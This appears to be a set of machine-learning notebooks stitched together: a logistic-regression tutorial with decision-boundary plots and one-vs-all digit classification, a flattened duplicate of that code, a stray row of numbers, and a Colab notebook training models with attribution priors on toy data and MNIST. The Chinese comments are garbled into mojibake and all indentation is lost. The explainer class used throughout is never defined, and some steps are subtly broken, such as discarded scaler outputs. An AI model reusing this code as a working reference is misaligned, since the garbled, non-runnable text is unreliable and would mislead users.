result = optimize.minimize(computeCost, mytheta, args=(myX, myy, mylambda), method='BFGS', options={'maxiter':500,'disp':False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheata(initial_theta, mappedX, y)
mincost
```
#### 2.4 Plotting the decision boundary
```
def plotBoundary(mytheta, myX, myy, mylambda=0.):
theta, mincost = optimizeRegularizedTheata(mytheta, myX, myy, mylambda)
xvals = np.linspace(-1, 1.5, 50)
yvals = np.linspace(-1, 1.5, 50)
zvals = np.zeros((len(xvals), len(yvals)))
for i in range(len(xvals)):
for j in range(len(yvals)):
myfeaturesij = mapFeature(6, np.array([xvals[i]]), np.array([yvals[j]]))
zvals[i][j] = np.dot(theta, myfeaturesij.T)
zvals = zvals.T
u, v= np.meshgrid(xvals, yvals)
mycontour = plt.contour(xvals, yvals, zvals, [0])
myfmt = {0:'Lambda = %d' % mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
plt.figure(figsize=(12, 10))
plt.subplot(221)
plotData()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plotData()
plotBoundary(theta, mappedX, y, 1.)
```
### 3. Logistic Regression with sklearn
```
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, :-1]
y = data[:, -1]
# ่ฟ้้่ฆๆไนฑ้กบๅบ๏ผๅ ไธบๆฐๆฎ้็ๆ ็ญพๆฏๆๅบ็
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# ็ปไธๅ็นๅพ
scaler = StandardScaler()
scaler.fit(X_train)
scaler.fit_transform(X_train)
scaler.fit_transform(X_test)
model = LogisticRegression()
model.fit(X_train, y_train)
# ่ฟ่ก้ขๆต
y_pred = model.predict(X_test)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f' % np.mean(np.float64(y_pred==y_test) * 100))
```
### 4. Logistic Regression with OneVsAll-handwriten digits
```
def display_data(imgData):
sum = 0
pad = 1 # ๅๅฒ็บฟ
display_array = -np.ones((pad + 10 * (20 + pad), pad + 10 * (20 + pad))) # (211, 211)
"""
ไธ้ข็ไบ็ปดๅพช็ฏๅฏ่ฝไธๆฏๅพๅฎนๆ็่งฃ:
ๅ
ถๅฎๅพ็ฎๅ๏ผๅฐฑๆฏๅฐๅ้ขๅพๅฐ็ๅ็ด ๅ
ๅฎนๅกซๅ
ๅฐๆไปฌๅๅๅฎไน็display_arrayไธญ
็ถๅ้่ฟpltๆพ็คบๅบๆฅ
"""
for i in range(10):
for j in range(10):
display_array[pad + i * (20 + pad):pad + i * (20 + pad) + 20,
pad + j * (20 + pad):pad + j * (20 + pad) + 20] \
= (imgData[sum, :].reshape(20, 20, order="F"))
sum += 1
plt.imshow(display_array, cmap='gray')
# plt.axis('off')
# plt.figure(figsize=(12, 12))
plt.show()
def oneVsAll(X, y, num_labels, Lambda):
m, n = X.shape
all_theta = np.zeros((n+1, num_labels)) # ่กฅไธtheta0
X = np.insert(X, 0, 1, axis=1)
class_y = np.zeros((m, num_labels))
initial_theta = np.zeros((n+1, 1))
for i in range(num_labels):
class_y[:, i] = np.int32(y==i).reshape(1, -1) # 0 -> 1000000000
# ่ฎก็ฎtheta
for i in range(num_labels):
result = optimize.fmin_bfgs(computeCost, initial_theta, fprime=gradient, args=(X, class_y[:, i], Lambda))
all_theta[:, i] = result.reshape(1, -1)
all_theta = all_theta.T
return all_theta
def gradient(initial_theta, X, y, initial_Lambda):
m = len(y)
h = sigmoid(np.dot(X, initial_theta.T))
theta1 = initial_theta.copy()
theta1[0] = 0
grad = np.zeros((initial_theta.shape[0]))
grad = np.dot(np.transpose(X), h-y)/m + initial_theta/m * theta1
return grad
def predict_oneVsAll(all_theta, X):
m = X.shape[0]
num_labels = all_theta.shape[0]
p = np.zeros((m, 1))
X = np.insert(X, 0, 1, axis=1)# X = np.hstack((np.ones((m, 1)), X))
h = sigmoid(np.dot(X, all_theta.T))
p = np.array(np.where(h[0, :]==np.max(h, axis=1)[0]))
for i in range(1, m):
t = np.array(np.where(h[i, :]==np.max(h, axis=1)[i]))
p = np.vstack((p, t))
return p
def sigmoid(z):
h = np.zeros((len(z), 1))
h = 1.0/(1.0+np.exp(-z))
return h
import scipy.io as spio
# ๅฉ็จscipy็io่ฏปmatๆไปถ
data = spio.loadmat('../../2_logistic_regression/logistic_reg_new/data_digits.mat')
X = data['X']
y = data['y']
m, n = X.shape # (5000, 400): feature: 20px*20px; training set: 5000
num_labels = 10 # 0, 1, 2, 3,...9
# ้ๆบๆพ็คบ100ไธชๆฐๅญๅพ็
rand_indices = [np.random.randint(0, m) for x in range(100)]
# X[rand_indices, :] ๅพๅฐ้ๆบ็100่ก
display_data(X[rand_indices, :])
Lambda = 0.1
all_theta = oneVsAll(X, y, num_labels, Lambda)
p = predict_oneVsAll(all_theta, X)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f%%' % np.mean(np.float64(p == y.reshape(-1, 1))*100))
```
### 5. OneVsAll with sklearn
```
X = data['X']
y = data['y']
y = np.ravel(y)
model = LogisticRegression()
model.fit(X, y)
p = model.predict(X)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f%%' % np.mean(np.float64(p==y) * 100))
```
|
github_jupyter
|
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
!ls ../../2_logistic_regression/logistic_reg_new/
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, 0:2]
X = np.insert(X, 0, 1, axis=1)
y = data[:, -1]
m = y.shape[0]
pos = np.where(y==1)
neg = np.where(y==0)
def plotData():
plt.figure(figsize=(10, 6))
plt.plot(X[pos][:, 1], X[pos][:, 2], 'k+', label='Admitted')
plt.plot(X[neg][:, 1], X[neg][:, 2], 'yo', label='Not Admitted')
# plt.grid(True)
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
plotData()
from scipy.special import expit # sigmoid function
myx = np.arange(-10, 10, .1)
plt.plot(myx, expit(myx))
plt.grid(True)
# Hypothesis function
def h(mytheta, myX):
return expit(np.dot(myX, mytheta))
# Cost function
def computeCost(mytheta, myX, myy, mylambda = 0.):
term1 = np.dot(-np.array(myy).T, np.log(h(mytheta, myX))) # y=1
term2 = np.dot((1-np.array(myy)).T, np.log(1-h(mytheta, myX))) # y=0
regterm = (mylambda/2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:]))
return float((1./m)*(np.sum(term1-term2)+regterm))
initial_theta = np.zeros((X.shape[1], 1))
computeCost(initial_theta, X, y)
from scipy import optimize
def optimizeTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.fmin(computeCost, x0=mytheta, args=(myX, myy, mylambda), maxiter=400, full_output=True)
return result[0], result[1]
theta, mincost = optimizeTheta(initial_theta, X, y)
print(computeCost(theta, X, y))
theta
boundary_xs = np.array([np.min(X[:, 1]), np.max(X[:, 1])])
boundary_ys = (-1/theta[2])*(theta[0]+theta[1]*boundary_xs)
plotData()
plt.plot(boundary_xs, boundary_ys, 'b-', label='Decision Boundary')
plt.legend()
print(h(theta, np.array([1, 45., 85.])))
def makePrediction(mytheta, myx):
return h(mytheta, myx) >= 0.5
pos_correct = float(np.sum(makePrediction(theta, X[pos])))
neg_correct = float(np.sum(np.invert(makePrediction(theta, X[neg]))))
tot = X[pos].shape[0]+X[neg].shape[0]
prcnt_correct = float(pos_correct+neg_correct)/tot
print('training set correctly predicted %f' % prcnt_correct)
cols = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data2.txt', delimiter=',', usecols=(0, 1, 2), unpack=True)
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size
X = np.insert(X, 0, 1, axis=1)
pos = np.array([X[i] for i in range(X.shape[0]) if y[i]==1]) # np[np.where(y==1)]
neg = np.array([X[i] for i in range(X.shape[0]) if y[i]==0])
def plotData():
plt.plot(pos[:, 1], pos[:, 2], 'k+', label='y=1')
plt.plot(neg[:, 1], neg[:, 2], 'yo', label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
# plt.grid(True)
plt.figure(figsize=(8, 8))
plotData()
def mapFeature(degrees,x1col, x2col):
# degrees = 2
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1*term2).reshape(term1.shape[0], 1)
out = np.hstack((out, term))
return out
mappedX = mapFeature(6, X[:, 1], X[:, 2])
mappedX.shape
initial_theta = np.zeros((mappedX.shape[1], 1))
computeCost(initial_theta, mappedX, y)
def optimizeRegularizedTheata(mytheta, myX, myy, mylambda=0.):
result = optimize.minimize(computeCost, mytheta, args=(myX, myy, mylambda), method='BFGS', options={'maxiter':500,'disp':False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheata(initial_theta, mappedX, y)
mincost
def plotBoundary(mytheta, myX, myy, mylambda=0.):
theta, mincost = optimizeRegularizedTheata(mytheta, myX, myy, mylambda)
xvals = np.linspace(-1, 1.5, 50)
yvals = np.linspace(-1, 1.5, 50)
zvals = np.zeros((len(xvals), len(yvals)))
for i in range(len(xvals)):
for j in range(len(yvals)):
myfeaturesij = mapFeature(6, np.array([xvals[i]]), np.array([yvals[j]]))
zvals[i][j] = np.dot(theta, myfeaturesij.T)
zvals = zvals.T
u, v= np.meshgrid(xvals, yvals)
mycontour = plt.contour(xvals, yvals, zvals, [0])
myfmt = {0:'Lambda = %d' % mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
plt.figure(figsize=(12, 10))
plt.subplot(221)
plotData()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plotData()
plotBoundary(theta, mappedX, y, 1.)
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
data = np.loadtxt('../../2_logistic_regression/logistic_reg_new/data1.txt', delimiter=',')
X = data[:, :-1]
y = data[:, -1]
# ่ฟ้้่ฆๆไนฑ้กบๅบ๏ผๅ ไธบๆฐๆฎ้็ๆ ็ญพๆฏๆๅบ็
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=0)
# ็ปไธๅ็นๅพ
scaler = StandardScaler()
scaler.fit(X_train)
scaler.fit_transform(X_train)
scaler.fit_transform(X_test)
model = LogisticRegression()
model.fit(X_train, y_train)
# ่ฟ่ก้ขๆต
y_pred = model.predict(X_test)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f' % np.mean(np.float64(y_pred==y_test) * 100))
def display_data(imgData):
sum = 0
pad = 1 # ๅๅฒ็บฟ
display_array = -np.ones((pad + 10 * (20 + pad), pad + 10 * (20 + pad))) # (211, 211)
"""
ไธ้ข็ไบ็ปดๅพช็ฏๅฏ่ฝไธๆฏๅพๅฎนๆ็่งฃ:
ๅ
ถๅฎๅพ็ฎๅ๏ผๅฐฑๆฏๅฐๅ้ขๅพๅฐ็ๅ็ด ๅ
ๅฎนๅกซๅ
ๅฐๆไปฌๅๅๅฎไน็display_arrayไธญ
็ถๅ้่ฟpltๆพ็คบๅบๆฅ
"""
for i in range(10):
for j in range(10):
display_array[pad + i * (20 + pad):pad + i * (20 + pad) + 20,
pad + j * (20 + pad):pad + j * (20 + pad) + 20] \
= (imgData[sum, :].reshape(20, 20, order="F"))
sum += 1
plt.imshow(display_array, cmap='gray')
# plt.axis('off')
# plt.figure(figsize=(12, 12))
plt.show()
def oneVsAll(X, y, num_labels, Lambda):
m, n = X.shape
all_theta = np.zeros((n+1, num_labels)) # ่กฅไธtheta0
X = np.insert(X, 0, 1, axis=1)
class_y = np.zeros((m, num_labels))
initial_theta = np.zeros((n+1, 1))
for i in range(num_labels):
class_y[:, i] = np.int32(y==i).reshape(1, -1) # 0 -> 1000000000
# ่ฎก็ฎtheta
for i in range(num_labels):
result = optimize.fmin_bfgs(computeCost, initial_theta, fprime=gradient, args=(X, class_y[:, i], Lambda))
all_theta[:, i] = result.reshape(1, -1)
all_theta = all_theta.T
return all_theta
def gradient(initial_theta, X, y, initial_Lambda):
m = len(y)
h = sigmoid(np.dot(X, initial_theta.T))
theta1 = initial_theta.copy()
theta1[0] = 0
grad = np.zeros((initial_theta.shape[0]))
grad = np.dot(np.transpose(X), h-y)/m + initial_theta/m * theta1
return grad
def predict_oneVsAll(all_theta, X):
m = X.shape[0]
num_labels = all_theta.shape[0]
p = np.zeros((m, 1))
X = np.insert(X, 0, 1, axis=1)# X = np.hstack((np.ones((m, 1)), X))
h = sigmoid(np.dot(X, all_theta.T))
p = np.array(np.where(h[0, :]==np.max(h, axis=1)[0]))
for i in range(1, m):
t = np.array(np.where(h[i, :]==np.max(h, axis=1)[i]))
p = np.vstack((p, t))
return p
def sigmoid(z):
h = np.zeros((len(z), 1))
h = 1.0/(1.0+np.exp(-z))
return h
import scipy.io as spio
# ๅฉ็จscipy็io่ฏปmatๆไปถ
data = spio.loadmat('../../2_logistic_regression/logistic_reg_new/data_digits.mat')
X = data['X']
y = data['y']
m, n = X.shape # (5000, 400): feature: 20px*20px; training set: 5000
num_labels = 10 # 0, 1, 2, 3,...9
# ้ๆบๆพ็คบ100ไธชๆฐๅญๅพ็
rand_indices = [np.random.randint(0, m) for x in range(100)]
# X[rand_indices, :] ๅพๅฐ้ๆบ็100่ก
display_data(X[rand_indices, :])
Lambda = 0.1
all_theta = oneVsAll(X, y, num_labels, Lambda)
p = predict_oneVsAll(all_theta, X)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f%%' % np.mean(np.float64(p == y.reshape(-1, 1))*100))
X = data['X']
y = data['y']
y = np.ravel(y)
model = LogisticRegression()
model.fit(X, y)
p = model.predict(X)
print('้ขๆตๅ็กฎ็ไธบ๏ผ%f%%' % np.mean(np.float64(p==y) * 100))
| 0.382949 | 0.968411 |
# Setting for Colab
Edit->Notebook Setting->Enable GPU
```
dir_of_file='MyDrive/Colab Notebooks/attributionpriors/examples'
from google.colab import drive
import os
drive.mount('./gdrive')
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
# Change the current working directory
os.chdir('./gdrive/'+dir_of_file)
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
import pkg_resources
if 'shap' not in [i.key for i in pkg_resources.working_set]:
!pip install shap
```
# Import library
```
import sys
sys.path.insert(0, '../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import altair as alt
import torch
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataset import random_split
import torchvision
from torchvision import transforms
import shap
```
# Demo
```
class BinaryData(Dataset):
def __init__(self, X, y=None, transform=None):
self.X=X
self.y=y
self.transform=transform
def __len__(self):
return len(self.X)
def __getitem__(self, index):
sample=self.X[index,:]
if self.transform is not None:
sample=self.transform(sample)
if self.y is not None:
return sample, self.y[index]
else:
return sample
batch_size=64
a_train=torch.empty(1000,1).uniform_(0,1)
x_train=torch.bernoulli(a_train)
x_train=torch.cat([x_train,x_train],axis=1)
y_train=x_train[:,0]
train_dataset=BinaryData(x_train, y_train)
train_loader=DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
#a_test=torch.empty(1000,2).uniform_(0,1)
#x_test=torch.bernoulli(a_test)
#y_test=x_test[:,0]
#test_dataset=BinaryData(x_test, y_test)
#test_loader=DataLoader(dataset=test_dataset, batch_size=64, shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
def calculate_dependence(model):
zero_arange=torch.tensor(np.concatenate([np.zeros(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
one_arange=torch.tensor(np.concatenate([np.ones(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
arange_zero=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.zeros(100).reshape(-1,1)],axis=1)).float().to(device)
arange_one=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.ones(100).reshape(-1,1)],axis=1)).float().to(device)
dep1=(model(one_arange)-model(zero_arange)).mean().detach().cpu().numpy().reshape(-1)[0]
dep2=(model(arange_one)-model(arange_zero)).mean().detach().cpu().numpy().reshape(-1)[0]
return dep2/dep1, dep1, dep2
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, None, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1), convergence_list1,label=k+1)
plt.xlim([40,75])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('epochs')
plt.ylabel('fractional dependence on feature 2')
plt.show()
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1)*(k+1), convergence_list1,label=k+1)
plt.xlim([0,350])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('gradient calls per training example')
plt.ylabel('fractional dependence on feature 2')
plt.show()
```
# example_usage
```
feature_mean=0
feature_sigma=1
dummy_sigma=0.5
n_samples=1000
n_features=3
X=np.random.randn(n_samples,n_features)*feature_sigma+feature_mean
X[:,2]=X[:,0]+np.random.randn(n_samples)*dummy_sigma
output_mean=0
output_sigma=0.5
Y=X[:,0]-X[:,1]+np.random.randn(n_samples)*output_sigma+output_mean
Y=Y.reshape([Y.shape[0],1])
data = pd.DataFrame({'Feature 0': X[:, 0], 'Feature 1': X[:, 1], 'Feature 2': X[:, 2], 'Outcome': Y.squeeze()})
alt.Chart(data).mark_point(filled=True).encode(
x=alt.X(alt.repeat('column'), type='quantitative', scale=alt.Scale(domain=[-4, 4])),
y=alt.Y('Outcome:Q', scale=alt.Scale(domain=[-6, 6]))
).properties(
height=200,
width=200
).repeat(
column=['Feature 0', 'Feature 1', 'Feature 2']
).properties(
title='The relationship between the outcome and the three features in our simulated data'
).configure_axis(
labelFontSize=15,
labelFontWeight=alt.FontWeight('lighter'),
titleFontSize=15,
titleFontWeight=alt.FontWeight('normal')
).configure_title(
fontSize=18
)
class CustomDataset(Dataset):
def __init__(self, x, y=None):
self.x=x
self.y=y
def __len__(self):
return len(self.x)
def __getitem__(self, index):
if self.y is not None:
return self.x[index], self.y[index]
else:
return self.x[index]
batch_size=20
dataset=CustomDataset(x=X,y=Y)
train_dataset, test_dataset, valid_dataset=random_split(dataset, [int(n_samples*0.8), int(n_samples*0.1), int(n_samples*0.1)])
train_dataloader=DataLoader(dataset=train_dataset, batch_size=20, shuffle=True, drop_last=True)
test_dataloader=DataLoader(dataset=test_dataset, batch_size=len(test_dataset), shuffle=True, drop_last=True)
valid_dataloader=DataLoader(dataset=valid_dataset, batch_size=len(valid_dataset), shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
class CustomModel(torch.nn.Module):
def __init__(self):
super(CustomModel,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(n_features,5),
torch.nn.ReLU(),
torch.nn.Linear(5,1))
def forward(self, x):
return self.layers(x)
```
## train with an attribution prior
```
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset[:][0], None, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset[:][0], None, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true) + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
```
### using shap.GradientExplainer
```
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
```
### using implemented explainer
```
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
```
## train without an attribution prior
```
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset, input_index=0, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset, input_index=0, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true)# + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
```
### using shap.GradientExplainer
```
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
```
### using implemented explainer
```
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
```
# MNIST
## download dataset
```
batch_size=50
num_epochs=60
valid_size=5000
train_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.RandomRotation([-15,15], fill = (0,)),
transforms.RandomAffine(degrees=0, translate=(4/28,4/28), fillcolor=0),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataset=Subset(train_dataset,range(valid_size,len(train_dataset)))
valid_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
valid_dataset=Subset(valid_dataset,range(valid_size))
test_dataset=torchvision.datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataloader=DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=batch_size)
valid_dataloader=DataLoader(valid_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
test_dataloader=DataLoader(test_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
class MNISTModel(torch.nn.Module):
def __init__(self):
super(MNISTModel,self).__init__()
layer1_conv=torch.nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer1_conv.weight);torch.nn.init.zeros_(layer1_conv.bias);
layer1_batchnorm=torch.nn.BatchNorm2d(num_features=32, momentum=0.1)
layer1_activation=torch.nn.ReLU()
layer1_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer2_conv=torch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer2_conv.weight);torch.nn.init.zeros_(layer2_conv.bias);
layer2_batchnorm=torch.nn.BatchNorm2d(num_features=64, momentum=0.1)
layer2_activation=torch.nn.ReLU()
layer2_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer3_flatten=torch.nn.Flatten()
layer3_fc=torch.nn.Linear(3136,1024);torch.nn.init.xavier_uniform_(layer3_fc.weight);torch.nn.init.zeros_(layer3_fc.bias);
layer3_activation=torch.nn.ReLU()
layer3_dropout=torch.nn.Dropout(p=0.5)
layer4_fc=torch.nn.Linear(1024, 10)
self.layers=torch.nn.Sequential(layer1_conv, layer1_batchnorm, layer1_activation, layer1_maxpool,
layer2_conv, layer2_batchnorm, layer2_activation, layer2_maxpool,
layer3_flatten, layer3_fc, layer3_activation, layer3_dropout,
layer4_fc)
#print(dir(self.layers))
#print(self.layers._get_name())
def forward(self,x):
x=self.layers(x)
return x
device=torch.device('cuda')
model=MNISTModel().to(device)
len(train_dataset)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
"""
global_step=0
"""
lamb=0.5
explainer=AttributionPriorExplainer(reference_dataset=train_dataset, input_index=0, batch_size=batch_size, k=5)
loss_func=torch.nn.CrossEntropyLoss()
for epoch in range(60):
for i, (images, labels_true) in enumerate(train_dataloader):
images, labels_true = images.to(device), labels_true.to(device)
optimizer.zero_grad()
labels_onehot_pred=model(images)
labels_onehot_true=torch.nn.functional.one_hot(labels_true, num_classes=10)
eg=explainer.attribution(model, images, valid_output=labels_onehot_true)
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
loss=loss_func(labels_onehot_pred, labels_true)
loss.backward(retain_graph=True)
optimizer.step()
"""
global_step+=1
if (global_step*50)%60000==0:
pass
"""
scheduler.step()
break
images.shape, labels_true.shape
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
images.shape
